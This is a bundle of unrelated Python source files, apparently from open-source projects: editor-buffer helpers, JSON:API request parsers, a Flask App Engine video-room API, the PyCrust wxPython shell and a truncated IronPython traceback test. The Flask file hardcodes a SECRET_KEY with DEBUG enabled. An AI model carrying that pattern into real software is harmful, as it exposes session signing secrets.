def exit_isearch(self, restore_original_line=False):
"""
Exit i-search mode.
"""
if restore_original_line and self.isearch_state:
self.working_index = self.isearch_state.original_working_index
self.cursor_position = self.isearch_state.original_cursor_position
self.isearch_state = None
def exit_selection(self):
self.selection_state = None
def open_in_editor(self):
"""
Open code in editor.
"""
# Write to temporary file
descriptor, filename = tempfile.mkstemp(self.tempfile_suffix)
os.write(descriptor, self.text.encode('utf-8'))
os.close(descriptor)
# Open in editor
self._open_file_in_editor(filename)
# Read content again.
with open(filename, 'rb') as f:
self.text = f.read().decode('utf-8')
self.cursor_position = len(self.text)
# Clean up temp file.
os.remove(filename)
def _open_file_in_editor(self, filename):
""" Call editor executable. """
# If the 'EDITOR' environment variable has been set, use that one.
# Otherwise, fall back to the first available editor that we can find.
editor = os.environ.get('EDITOR')
editors = [
editor,
# Order of preference.
'/usr/bin/editor',
'/usr/bin/nano',
'/usr/bin/pico',
'/usr/bin/vi',
'/usr/bin/emacs',
]
for e in editors:
if e:
try:
subprocess.call([e, filename])
return
except OSError:
# Executable does not exist, try the next one.
pass
def indent(line, from_row, to_row, count=1):
"""
Indent text of the `Line` object.
"""
current_row = line.document.cursor_position_row
line_range = range(from_row, to_row)
line.transform_lines(line_range, lambda l: ' ' * count + l)
line.cursor_position = line.document.translate_row_col_to_index(current_row, 0)
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
def unindent(line, from_row, to_row, count=1):
"""
Unindent text of the `Line` object.
"""
current_row = line.document.cursor_position_row
line_range = range(from_row, to_row)
def transform(text):
remove = ' ' * count
if text.startswith(remove):
return text[len(remove):]
else:
return text.lstrip()
line.transform_lines(line_range, transform)
line.cursor_position = line.document.translate_row_col_to_index(current_row, 0)
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
|
|
import collections
from rest_framework.parsers import JSONParser
from rest_framework.exceptions import ParseError
from api.base.utils import is_bulk_request
from api.base.renderers import JSONAPIRenderer
from api.base.exceptions import JSONAPIException
NO_ATTRIBUTES_ERROR = 'Request must include /data/attributes.'
NO_RELATIONSHIPS_ERROR = 'Request must include /data/relationships.'
NO_DATA_ERROR = 'Request must include /data.'
NO_TYPE_ERROR = 'Request must include /type.'
NO_ID_ERROR = 'Request must include /data/id.'
class JSONAPIParser(JSONParser):
"""
Parses JSON-serialized data. Overrides media_type.
"""
media_type = 'application/vnd.api+json'
renderer_class = JSONAPIRenderer
# Overrides JSONParser
def flatten_relationships(self, relationships):
"""
Flattens relationships dictionary which has information needed to create related resource objects.
Validates that formatting of relationships dictionary is correct.
"""
if not isinstance(relationships, dict):
raise ParseError()
# Can only create one type of relationship.
related_resource = relationships.keys()[0]
if not isinstance(relationships[related_resource], dict) or related_resource == 'data':
raise ParseError()
data = relationships[related_resource].get('data')
if not data:
raise JSONAPIException(source={'pointer': 'data/relationships/{}/data'.format(related_resource)}, detail=NO_DATA_ERROR)
target_type = data.get('type')
if not target_type:
raise JSONAPIException(source={'pointer': 'data/relationships/{}/data/type'.format(related_resource)}, detail=NO_TYPE_ERROR)
id = data.get('id')
return {'id': id, 'target_type': target_type}
def flatten_data(self, resource_object, parser_context, is_list):
"""
Flattens data objects, making attributes and relationships fields the same level as id and type.
"""
relationships = resource_object.get('relationships')
is_relationship = parser_context.get('is_relationship')
attributes_required = parser_context.get('attributes_required', True)
request_method = parser_context['request'].method
# Request must include "relationships" or "attributes"
if is_relationship and request_method == 'POST':
if not relationships:
raise JSONAPIException(source={'pointer': '/data/relationships'}, detail=NO_RELATIONSHIPS_ERROR)
else:
if 'attributes' not in resource_object and attributes_required and request_method != 'DELETE':
raise JSONAPIException(source={'pointer': '/data/attributes'}, detail=NO_ATTRIBUTES_ERROR)
object_id = resource_object.get('id')
object_type = resource_object.get('type')
# For validating type and id for bulk delete:
if is_list and request_method == 'DELETE':
if object_id is None:
raise JSONAPIException(source={'pointer': '/data/id'}, detail=NO_ID_ERROR)
if object_type is None:
raise JSONAPIException(source={'pointer': '/data/type'}, detail=NO_TYPE_ERROR)
attributes = resource_object.get('attributes')
parsed = {'id': object_id, 'type': object_type}
if attributes:
parsed.update(attributes)
if relationships:
relationships = self.flatten_relationships(relationships)
parsed.update(relationships)
return parsed
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as JSON and returns the resulting data.
"""
result = super(JSONAPIParser, self).parse(stream, media_type=media_type, parser_context=parser_context)
if not isinstance(result, dict):
raise ParseError()
data = result.get('data', {})
if data:
if is_bulk_request(parser_context['request']):
if not isinstance(data, list):
raise ParseError('Expected a list of items but got type "dict".')
data_collection = []
data_collection.extend([self.flatten_data(data_object, parser_context, is_list=True) for data_object in data])
return data_collection
else:
if not isinstance(data, collections.Mapping):
raise ParseError('Expected a dictionary of items.')
return self.flatten_data(data, parser_context, is_list=False)
else:
raise JSONAPIException(source={'pointer': '/data'}, detail=NO_DATA_ERROR)
class JSONAPIParserForRegularJSON(JSONAPIParser):
"""
Allows same processing as JSONAPIParser to occur for requests with application/json media type.
"""
media_type = 'application/json'
class JSONAPIRelationshipParser(JSONParser):
"""
Parses JSON-serialized data for relationship endpoints. Overrides media_type.
"""
media_type = 'application/vnd.api+json'
def parse(self, stream, media_type=None, parser_context=None):
res = super(JSONAPIRelationshipParser, self).parse(stream, media_type, parser_context)
if not isinstance(res, dict):
raise ParseError('Request body must be dictionary')
data = res.get('data')
if data:
if not isinstance(data, list):
raise ParseError('Data must be an array')
for i, datum in enumerate(data):
if datum.get('id') is None:
raise JSONAPIException(source={'pointer': '/data/{}/id'.format(str(i))}, detail=NO_ID_ERROR)
if datum.get('type') is None:
raise JSONAPIException(source={'pointer': '/data/{}/type'.format(str(i))}, detail=NO_TYPE_ERROR)
return {'data': data}
return {'data': []}
class JSONAPIRelationshipParserForRegularJSON(JSONAPIRelationshipParser):
"""
Allows same processing as JSONAPIRelationshipParser to occur for requests with application/json media type.
"""
media_type = 'application/json'
class JSONAPIOnetoOneRelationshipParser(JSONParser):
"""
Parses JSON-serialized data for relationship endpoints. Overrides media_type.
"""
media_type = 'application/vnd.api+json'
def parse(self, stream, media_type=None, parser_context=None):
res = super(JSONAPIOnetoOneRelationshipParser, self).parse(stream, media_type, parser_context)
if not isinstance(res, dict):
raise ParseError('Request body must be dictionary')
data = res.get('data')
if data:
id_ = data.get('id')
type_ = data.get('type')
if id_ is None:
raise JSONAPIException(source={'pointer': '/data/id'}, detail=NO_ID_ERROR)
if type_ is None:
raise JSONAPIException(source={'pointer': '/data/type'}, detail=NO_TYPE_ERROR)
return data
return {'type': None, 'id': None}
class JSONAPIOnetoOneRelationshipParserForRegularJSON(JSONAPIOnetoOneRelationshipParser):
"""
Allows same processing as JSONAPIRelationshipParser to occur for requests with application/json media type.
"""
media_type = 'application/json'
class JSONAPIMultipleRelationshipsParser(JSONAPIParser):
def flatten_relationships(self, relationships):
rel = {}
for resource in relationships:
ret = super(JSONAPIMultipleRelationshipsParser, self).flatten_relationships({resource: relationships[resource]})
if ret.get('target_type') and ret.get('id'):
rel[resource] = ret['id']
return rel
class JSONAPIMultipleRelationshipsParserForRegularJSON(JSONAPIParserForRegularJSON):
def flatten_relationships(self, relationships):
ret = super(JSONAPIMultipleRelationshipsParserForRegularJSON, self).flatten_relationships(relationships)
related_resource = relationships.keys()[0]
if ret.get('target_type') and ret.get('id'):
return {related_resource: ret['id']}
return ret
|
|
#!/usr/bin/env python
#
# Copyright 2014 Chundong Wang
#
import logging
import json
import os
import flask
import time
from datetime import datetime,timedelta
import traceback
from model import DateTimeEncoder,Room
from flask import render_template,abort
from google.appengine.api import users
from google.appengine.api import memcache
app = flask.Flask(__name__, template_folder='webapp')
app.config.update(dict(
DEBUG=True,
SECRET_KEY='t0&&r1o-uf=+5e$)3#p+)9m^qc)5zklxr7%ork7k7sm@*hmok5'
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
# Note: We don't need to call run() since our application is embedded within
# the App Engine WSGI application server.
_is_local = os.environ['SERVER_SOFTWARE'].startswith('Development')
def isLocal():
return _is_local
def json_succ(extra=None,data=None):
resp = {"result":"SUCCEED"}
if extra is not None:
resp["extra"]=extra
if data is not None:
resp["data"]=data
return json_response(resp)
class Reason:
ROOM_NAME_REQUIRED=1
EXIST_ROOM_NAME=2
NO_ROOM_FOUND=3
LOGIN_REQUIRED=401
INVALID_PARAMETER=400
FORBIDDEN_OPERATION=403
def caller(up=0):
'''Get file name, line number, function name and
source text of the caller's caller as 4-tuple:
(file, line, func, text).
The optional argument 'up' allows retrieval of
a caller further back up into the call stack.
Note, the source text may be None and function
name may be '?' in the returned result. In
Python 2.3+ the file name may be an absolute
path.
'''
try: # just get a few frames
f = traceback.extract_stack(limit=up+2)
if f:
return f[0]
except:
if isLocal():
traceback.print_exc()
pass
# running with psyco?
return ('', 0, '', None)
def json_fail(reason=None,extra=None,data=None):
resp = {"result":"FAILED"}
if reason is not None:
resp["reason"]=reason
if extra is not None:
resp["extra"]=extra
if data is not None:
resp["data"]=data
if isLocal():
(filename, line, func, text) = caller(up=1)
logging.warning('error[%d] occured in %s:%s, %s.'%(reason, filename, line, func))
if reason == Reason.LOGIN_REQUIRED:
abort(401)
return json_response(resp)
def json_response(obj):
response = flask.make_response(json.dumps(obj, cls=DateTimeEncoder))
response.headers['Content-Type'] = 'application/json'
response.headers['mimetype'] = 'application/json'
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
return response
def update_current_time(room):
if room.state == "PLAYING":
real_current_time = timedelta(seconds=room.current_time) + (datetime.now()-room.last_update)
room.current_time = int(real_current_time.total_seconds())
return room
def get_return_url(request):
return_url = request.referrer
if "X-continue-url" in request.headers:
return_url = request.headers["X-continue-url"]
return return_url
@app.route('/room', methods=['GET', 'POST'])
@app.route('/room/<room_name>', methods=['GET', 'PUT', 'DELETE'])
def room_api(room_name=None):
user = users.get_current_user()
if flask.request.method == 'GET':
if room_name is None:
rooms = []
if not user:
rooms = Room.fetch_all_anonymous()
else:
rooms = Room.fetch_all()
for room in rooms:
update_current_time(room)
return json_response([room.to_dict() for room in rooms])
else:
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
update_current_time(room)
return json_response(room.to_dict())
elif flask.request.method == 'POST':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
else:
room_info = flask.request.get_json(silent=True)
if room_info is None:
return json_fail(Reason.INVALID_PARAMETER)
if "name" not in room_info:
return json_fail(Reason.ROOM_NAME_REQUIRED)
room = Room.fetch_by_name(room_info["name"])
logging.info('create_room(%s):%s'%(room_info["name"],room.__class__.__name__))
if room is not None:
return json_fail(Reason.EXIST_ROOM_NAME)
room = Room(creator_email=user.email(), name=room_info["name"])
if "current_time" in room_info:
room.current_time=int(room_info["current_time"])
if "cover" in room_info:
room.cover=room_info["cover"]
room.put()
update_current_time(room)
return json_succ(data=room.to_dict())
elif flask.request.method == 'PUT':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
logging.info('update_room(%s):%s'%(room_name,room.__class__.__name__))
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
room_info = flask.request.get_json(silent=True)
if room_info is None:
return json_fail(Reason.INVALID_PARAMETER)
if "current_time" in room_info:
room.current_time=int(room_info["current_time"])
if "cover" in room_info:
room.cover=room_info["cover"]
room.put()
return json_succ()
elif flask.request.method == 'DELETE':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
logging.info('delete_room(%s):%s'%(room_name,room.__class__.__name__))
if room is not None:
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
else:
room.key.delete()
return json_succ()
else:
return json_fail(Reason.NO_ROOM_FOUND, room_name)
else:
return json_fail(Reason.INVALID_PARAMETER)
@app.route('/room/<room_name>/video', methods=['GET', 'POST', 'PUT'])
@app.route('/room/<room_name>/video/<video_index>', methods=['GET', 'PUT', 'DELETE'])
def video_api(room_name, video_index=None):
user = users.get_current_user()
if flask.request.method == 'GET':
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if video_index is None:
return json_response(room.video_ids)
elif video_index >= len(room.video_ids):
return json_fail(Reason.INVALID_PARAMETER)
else:
return json_response(room.video_ids[video_index])
elif flask.request.method == 'POST':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
video_info = flask.request.get_json(silent=True)
if video_info is None or "id" not in video_info:
return json_fail(Reason.INVALID_PARAMETER)
room.video_ids.append(video_info["id"]);
room.put()
return json_succ()
elif flask.request.method == 'PUT':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
video_action = flask.request.get_json(silent=True)
if video_action is None:
return json_fail(Reason.INVALID_PARAMETER)
if "op" not in video_action or "current_time" not in video_action or "roundtrip" not in video_action:
return json_fail(Reason.INVALID_PARAMETER)
if video_action["op"] not in ['NOTSTARTED', 'PAUSED', 'PLAYING', 'ENDED']:
return json_fail(Reason.INVALID_PARAMETER)
room.state = video_action["op"]
# Save current_time+roundtrip/2 and last updated time.
# When read, it'll be now()-last_updated_time+current_time+roundtrip/2
room.current_time = int(int(video_action["current_time"]) + float(video_action["roundtrip"])/2)
room.put()
return json_succ()
elif flask.request.method == 'DELETE':
if not user:
return json_fail(Reason.LOGIN_REQUIRED)
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
if user.email() != room.creator_email:
return json_fail(Reason.FORBIDDEN_OPERATION)
#could only remove video_id at 0
video_index = int(video_index)
if video_index != 0:
return json_fail(Reason.INVALID_PARAMETER)
logging.info('delete_video(%s:%d):%s'%(room_name,video_index,room.__class__.__name__))
room.video_ids = room.video_ids[1:]
room.put()
return json_succ()
else:
return json_fail(Reason.INVALID_PARAMETER)
@app.route('/room/<room_name>/current_time', methods=['GET'])
def video_sync_api(room_name):
room = Room.fetch_by_name(room_name)
if room is None:
return json_fail(Reason.NO_ROOM_FOUND)
update_current_time(room)
return json_response({"current_time":room.current_time})
@app.route('/auth', methods=['GET'])
def authenticate_api():
user = users.get_current_user()
if user is not None:
return json_response({"user_email":user.email()})
else:
return json_response({"login_url":users.create_login_url(get_return_url(flask.request))})
@app.route('/roundtrip')
@app.route('/roundtrip/<server_timestamp>')
def roundtrip(server_timestamp=None):
if server_timestamp is None:
return json_response({"server_timestamp":float(time.time())})
else:
roundtrip = time.time()-float(server_timestamp)
return json_response({"roundtrip":float(roundtrip)})
@app.errorhandler(400)
def invalid_parameter(error):
return flask.Response('Ajax API raises invalid parameter error.', 400)
@app.errorhandler(401)
def require_login(error):
return_url = get_return_url(flask.request)
logging.info('401:%s' % return_url)
login_url = users.create_login_url(return_url)
return flask.Response('Ajax APIs requires user to <a href="%s">login</a> first.' % login_url, 401,
{'WWW-Authenticate':'Basic realm="Login Required"','LoginUrl':login_url})
@app.errorhandler(404)
def page_not_found(error):
return flask.Response('Sorry, nothing at this URL.', 404)
if __name__ == '__main__':
app.run()
|
|
"""Crust combines the shell and filling into one control."""
__author__ = "Patrick K. O'Brien <[email protected]>"
__cvsid__ = "$Id: crust.py 44235 2007-01-17 23:05:14Z RD $"
__revision__ = "$Revision: 44235 $"[11:-2]
import wx
import os
import pprint
import re
import sys
import dispatcher
import editwindow
from filling import Filling
import frame
from shell import Shell
from version import VERSION
class Crust(wx.SplitterWindow):
"""Crust based on SplitterWindow."""
name = 'Crust'
revision = __revision__
sashoffset = 300
def __init__(self, parent, id=-1, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.SP_3D|wx.SP_LIVE_UPDATE,
name='Crust Window', rootObject=None, rootLabel=None,
rootIsNamespace=True, intro='', locals=None,
InterpClass=None,
startupScript=None, execStartupScript=True,
*args, **kwds):
"""Create Crust instance."""
wx.SplitterWindow.__init__(self, parent, id, pos, size, style, name)
# Turn off the tab-traversal style that is automatically
# turned on by wx.SplitterWindow. We do this because on
# Windows the event for Ctrl-Enter is stolen and used as a
# navigation key, but the Shell window uses it to insert lines.
style = self.GetWindowStyle()
self.SetWindowStyle(style & ~wx.TAB_TRAVERSAL)
self.shell = Shell(parent=self, introText=intro,
locals=locals, InterpClass=InterpClass,
startupScript=startupScript,
execStartupScript=execStartupScript,
*args, **kwds)
self.editor = self.shell
if rootObject is None:
rootObject = self.shell.interp.locals
self.notebook = wx.Notebook(parent=self, id=-1)
self.shell.interp.locals['notebook'] = self.notebook
self.filling = Filling(parent=self.notebook,
rootObject=rootObject,
rootLabel=rootLabel,
rootIsNamespace=rootIsNamespace)
# Add 'filling' to the interpreter's locals.
self.shell.interp.locals['filling'] = self.filling
self.notebook.AddPage(page=self.filling, text='Namespace', select=True)
self.display = Display(parent=self.notebook)
self.notebook.AddPage(page=self.display, text='Display')
# Add 'pp' (pretty print) to the interpreter's locals.
self.shell.interp.locals['pp'] = self.display.setItem
self.display.nbTab = self.notebook.GetPageCount()-1
self.calltip = Calltip(parent=self.notebook)
self.notebook.AddPage(page=self.calltip, text='Calltip')
self.sessionlisting = SessionListing(parent=self.notebook)
self.notebook.AddPage(page=self.sessionlisting, text='History')
self.dispatcherlisting = DispatcherListing(parent=self.notebook)
self.notebook.AddPage(page=self.dispatcherlisting, text='Dispatcher')
# Initialize in an unsplit mode, and check later after loading
# settings if we should split or not.
self.shell.Hide()
self.notebook.Hide()
self.Initialize(self.shell)
self._shouldsplit = True
wx.CallAfter(self._CheckShouldSplit)
self.SetMinimumPaneSize(100)
self.Bind(wx.EVT_SIZE, self.SplitterOnSize)
self.Bind(wx.EVT_SPLITTER_SASH_POS_CHANGED, self.OnChanged)
self.Bind(wx.EVT_SPLITTER_DCLICK, self.OnSashDClick)
def _CheckShouldSplit(self):
if self._shouldsplit:
self.SplitHorizontally(self.shell, self.notebook, -self.sashoffset)
self.lastsashpos = self.GetSashPosition()
else:
self.lastsashpos = -1
self.issplit = self.IsSplit()
def ToggleTools(self):
"""Toggle the display of the filling and other tools"""
if self.issplit:
self.Unsplit()
else:
self.SplitHorizontally(self.shell, self.notebook, -self.sashoffset)
self.lastsashpos = self.GetSashPosition()
self.issplit = self.IsSplit()
def ToolsShown(self):
return self.issplit
def OnChanged(self, event):
"""update sash offset from the bottom of the window"""
self.sashoffset = self.GetSize().height - event.GetSashPosition()
self.lastsashpos = event.GetSashPosition()
event.Skip()
def OnSashDClick(self, event):
self.Unsplit()
self.issplit = False
# Make the splitter expand the top window when resized
def SplitterOnSize(self, event):
splitter = event.GetEventObject()
sz = splitter.GetSize()
splitter.SetSashPosition(sz.height - self.sashoffset, True)
event.Skip()
def LoadSettings(self, config):
self.shell.LoadSettings(config)
self.filling.LoadSettings(config)
pos = config.ReadInt('Sash/CrustPos', 400)
wx.CallAfter(self.SetSashPosition, pos)
def _updateSashPosValue():
sz = self.GetSize()
self.sashoffset = sz.height - self.GetSashPosition()
wx.CallAfter(_updateSashPosValue)
zoom = config.ReadInt('View/Zoom/Display', -99)
if zoom != -99:
self.display.SetZoom(zoom)
self.issplit = config.ReadInt('Sash/IsSplit', True)
if not self.issplit:
self._shouldsplit = False
def SaveSettings(self, config):
self.shell.SaveSettings(config)
self.filling.SaveSettings(config)
if self.lastsashpos != -1:
config.WriteInt('Sash/CrustPos', self.lastsashpos)
config.WriteInt('Sash/IsSplit', self.issplit)
config.WriteInt('View/Zoom/Display', self.display.GetZoom())
class Display(editwindow.EditWindow):
"""STC used to display an object using Pretty Print."""
def __init__(self, parent, id=-1, pos=wx.DefaultPosition,
size=wx.DefaultSize,
style=wx.CLIP_CHILDREN | wx.SUNKEN_BORDER,
static=False):
"""Create Display instance."""
editwindow.EditWindow.__init__(self, parent, id, pos, size, style)
# Configure various defaults and user preferences.
self.SetReadOnly(True)
self.SetWrapMode(False)
if not static:
dispatcher.connect(receiver=self.push, signal='Interpreter.push')
def push(self, command, more):
"""Receiver for Interpreter.push signal."""
self.Refresh()
def Refresh(self):
if not hasattr(self, "item"):
return
self.SetReadOnly(False)
text = pprint.pformat(self.item)
self.SetText(text)
self.SetReadOnly(True)
def setItem(self, item):
"""Set item to pretty print in the notebook Display tab."""
self.item = item
self.Refresh()
if self.GetParent().GetSelection() != self.nbTab:
focus = wx.Window.FindFocus()
self.GetParent().SetSelection(self.nbTab)
wx.CallAfter(focus.SetFocus)
# TODO: Switch this to a editwindow.EditWindow
class Calltip(wx.TextCtrl):
"""Text control containing the most recent shell calltip."""
def __init__(self, parent=None, id=-1):
style = (wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_RICH2)
wx.TextCtrl.__init__(self, parent, id, style=style)
self.SetBackgroundColour(wx.Colour(255, 255, 208))
dispatcher.connect(receiver=self.display, signal='Shell.calltip')
df = self.GetFont()
font = wx.Font(df.GetPointSize(), wx.TELETYPE, wx.NORMAL, wx.NORMAL)
self.SetFont(font)
def display(self, calltip):
"""Receiver for Shell.calltip signal."""
## self.SetValue(calltip) # Caused refresh problem on Windows.
self.Clear()
self.AppendText(calltip)
# TODO: Switch this to a editwindow.EditWindow
class SessionListing(wx.TextCtrl):
"""Text control containing all commands for session."""
def __init__(self, parent=None, id=-1):
style = (wx.TE_MULTILINE | wx.TE_READONLY |
wx.TE_RICH2 | wx.TE_DONTWRAP)
wx.TextCtrl.__init__(self, parent, id, style=style)
dispatcher.connect(receiver=self.addHistory, signal="Shell.addHistory")
dispatcher.connect(receiver=self.clearHistory, signal="Shell.clearHistory")
dispatcher.connect(receiver=self.loadHistory, signal="Shell.loadHistory")
df = self.GetFont()
font = wx.Font(df.GetPointSize(), wx.TELETYPE, wx.NORMAL, wx.NORMAL)
self.SetFont(font)
def loadHistory(self, history):
# preload the existing history, if any
hist = history[:]
hist.reverse()
self.SetValue('\n'.join(hist) + '\n')
self.SetInsertionPointEnd()
def addHistory(self, command):
if command:
self.SetInsertionPointEnd()
self.AppendText(command + '\n')
def clearHistory(self):
self.SetValue("")
class DispatcherListing(wx.TextCtrl):
"""Text control containing all dispatches for session."""
def __init__(self, parent=None, id=-1):
style = (wx.TE_MULTILINE | wx.TE_READONLY |
wx.TE_RICH2 | wx.TE_DONTWRAP)
wx.TextCtrl.__init__(self, parent, id, style=style)
dispatcher.connect(receiver=self.spy)
df = self.GetFont()
font = wx.Font(df.GetPointSize(), wx.TELETYPE, wx.NORMAL, wx.NORMAL)
self.SetFont(font)
def spy(self, signal, sender):
"""Receiver for Any signal from Any sender."""
text = '%r from %s' % (signal, sender)
self.SetInsertionPointEnd()
start, end = self.GetSelection()
if start != end:
self.SetSelection(0, 0)
self.AppendText(text + '\n')
class CrustFrame(frame.Frame, frame.ShellFrameMixin):
"""Frame containing all the PyCrust components."""
name = 'CrustFrame'
revision = __revision__
def __init__(self, parent=None, id=-1, title='PyCrust',
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=wx.DEFAULT_FRAME_STYLE,
rootObject=None, rootLabel=None, rootIsNamespace=True,
locals=None, InterpClass=None,
config=None, dataDir=None,
*args, **kwds):
"""Create CrustFrame instance."""
frame.Frame.__init__(self, parent, id, title, pos, size, style)
frame.ShellFrameMixin.__init__(self, config, dataDir)
if size == wx.DefaultSize:
self.SetSize((800, 600))
intro = 'PyCrust %s - The Flakiest Python Shell' % VERSION
self.SetStatusText(intro.replace('\n', ', '))
self.crust = Crust(parent=self, intro=intro,
rootObject=rootObject,
rootLabel=rootLabel,
rootIsNamespace=rootIsNamespace,
locals=locals,
InterpClass=InterpClass,
startupScript=self.startupScript,
execStartupScript=self.execStartupScript,
*args, **kwds)
self.shell = self.crust.shell
# Override the filling so that status messages go to the status bar.
self.crust.filling.tree.setStatusText = self.SetStatusText
# Override the shell so that status messages go to the status bar.
self.shell.setStatusText = self.SetStatusText
self.shell.SetFocus()
self.LoadSettings()
def OnClose(self, event):
"""Event handler for closing."""
self.SaveSettings()
self.crust.shell.destroy()
self.Destroy()
def OnAbout(self, event):
"""Display an About window."""
title = 'About PyCrust'
text = 'PyCrust %s\n\n' % VERSION + \
'Yet another Python shell, only flakier.\n\n' + \
'Half-baked by Patrick K. O\'Brien,\n' + \
'the other half is still in the oven.\n\n' + \
'Shell Revision: %s\n' % self.shell.revision + \
'Interpreter Revision: %s\n\n' % self.shell.interp.revision + \
'Platform: %s\n' % sys.platform + \
'Python Version: %s\n' % sys.version.split()[0] + \
'wxPython Version: %s\n' % wx.VERSION_STRING + \
('\t(%s)\n' % ", ".join(wx.PlatformInfo[1:]))
dialog = wx.MessageDialog(self, text, title,
wx.OK | wx.ICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def ToggleTools(self):
"""Toggle the display of the filling and other tools"""
return self.crust.ToggleTools()
def ToolsShown(self):
return self.crust.ToolsShown()
def OnHelp(self, event):
"""Show a help dialog."""
frame.ShellFrameMixin.OnHelp(self, event)
def LoadSettings(self):
if self.config is not None:
frame.ShellFrameMixin.LoadSettings(self)
frame.Frame.LoadSettings(self, self.config)
self.crust.LoadSettings(self.config)
def SaveSettings(self, force=False):
if self.config is not None:
frame.ShellFrameMixin.SaveSettings(self)
if self.autoSaveSettings or force:
frame.Frame.SaveSettings(self, self.config)
self.crust.SaveSettings(self.config)
def DoSaveSettings(self):
if self.config is not None:
self.SaveSettings(force=True)
self.config.Flush()
|
|
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
# !!! DO NOT MOVE OR CHANGE THE FOLLOWING LINES
def _raise_exception():
raise Exception()
_retb = (18, 0, 'test_traceback.py', '_raise_exception')
from iptest.assert_util import *
from iptest.file_util import *
import imp
if not is_cli: import os
def _raise_exception_with_finally():
try:
raise Exception()
finally:
pass
_rewftb= (27, 0, 'test_traceback.py', '_raise_exception_with_finally')
def assert_traceback(expected):
import sys
tb = sys.exc_info()[2]
if expected is None:
AreEqual(None, expected)
else:
tb_list = []
while tb is not None :
f = tb.tb_frame
co = f.f_code
filename = co.co_filename.lower()
name = co.co_name
tb_list.append((tb.tb_lineno, tb.tb_lasti, filename, name))
tb = tb.tb_next
#print tb_list
AreEqual(len(tb_list), len(expected))
for x in range(len(expected)):
AreEqual(tb_list[x][0], expected[x][0])
AreEqual(tb_list[x][2:], expected[x][2:])
def test_no_traceback():
#assert_traceback(None)
try:
_raise_exception()
except:
pass
assert_traceback(None)
FILE="test_traceback.py"
LINE100 = 70
def test_catch_others_exception():
try:
_raise_exception()
except:
assert_traceback([(LINE100 + 2, 0, FILE, 'test_catch_others_exception'), _retb])
LINE110 = 78
def test_catch_its_own_exception():
try:
raise Exception()
except:
assert_traceback([(LINE110 + 2, 0, FILE, 'test_catch_its_own_exception')])
LINE120 = 86
def test_catch_others_exception_with_finally():
try:
_raise_exception_with_finally()
except:
assert_traceback([(LINE120 + 2, 0, FILE, 'test_catch_others_exception_with_finally'), _rewftb])
LINE130 = 94
def test_nested_caught_outside():
try:
x = 2
try:
_raise_exception()
except NameError:
Assert(False, "unhittable")
y = 2
except:
assert_traceback([(LINE130 + 4, 0, FILE, 'test_nested_caught_outside'), _retb])
LINE140 = 108
def test_nested_caught_inside():
try:
x = 2
try:
_raise_exception()
except:
assert_traceback([(LINE140 + 4, 0, FILE, 'test_nested_caught_inside'), _retb])
y = 2
except:
assert_traceback(None)
LINE150 = 120
def test_throw_in_except():
try:
_raise_exception()
except:
assert_traceback([(LINE150+2, 0, FILE, 'test_throw_in_except'), _retb])
try:
assert_traceback([(LINE150+2, 0, FILE, 'test_throw_in_except'), _retb])
_raise_exception()
except:
assert_traceback([(LINE150+7, 0, FILE, 'test_throw_in_except'), _retb])
assert_traceback([(LINE150+7, 0, FILE, 'test_throw_in_except'), _retb])
LINE160 = 134
class C1:
def M(self):
try:
_raise_exception()
except:
assert_traceback([(LINE160 + 3, 0, FILE, 'M'), _retb])
def test_throw_in_method():
c = C1()
c.M()
LINE170 = 147
def test_throw_when_defining_class():
class C2(object):
try:
_raise_exception()
except:
assert_traceback([(LINE170 + 3, 0, FILE, 'C2'), _retb])
def throw_when_defining_class_directly():
class C3(C1):
_raise_exception()
LINE180 = 160
def test_throw_when_defining_class_directly():
try:
throw_when_defining_class_directly()
except:
assert_traceback([(LINE180 + 2, 0, FILE, 'test_throw_when_defining_class_directly'),
(LINE180 - 5, 0, FILE, 'throw_when_defining_class_directly'),
(LINE180 - 4, 0, FILE, 'C3'), _retb])
LINE200 = 169
def test_compiled_code():
try:
codeobj = compile('\nraise Exception()', '<mycode>', 'exec')
exec(codeobj, {})
except:
assert_traceback([(LINE200+3, 0, FILE, 'test_compiled_code'), (2, 0, '<mycode>', '<module>')])
def generator_throw_before_yield():
_raise_exception()
yield 1
LINE210 = 181
def test_throw_before_yield():
try:
for x in generator_throw_before_yield():
pass
except:
assert_traceback([(LINE210+3, 0, FILE, 'test_throw_before_yield'), (LINE210-4, 2, 'test_traceback.py', 'generator_throw_before_yield'), _retb])
def generator_throw_after_yield():
yield 1
_raise_exception()
LINE220 = 194
def test_throw_while_yield():
try:
for x in generator_throw_while_yield():
pass
except:
